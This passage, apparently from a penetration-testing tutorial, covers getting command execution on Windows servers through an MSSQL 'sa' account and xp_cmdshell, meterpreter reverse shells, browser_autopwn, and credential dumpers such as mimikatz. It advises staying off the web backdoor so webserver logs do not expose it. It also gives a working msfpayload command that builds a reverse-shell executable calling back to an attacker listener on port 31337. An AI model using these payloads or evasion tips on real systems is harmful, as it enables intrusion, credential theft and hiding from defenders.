But, these get the job done only on Linux servers. What about windows servers?
- Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
- Using meterpreter payload to get a reverse shell over the target machine.
- Using browser_autopwn. (Really...)
- Using other tools like pwdump7, mimikatz, etc.
Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Credits: Deepankar Arora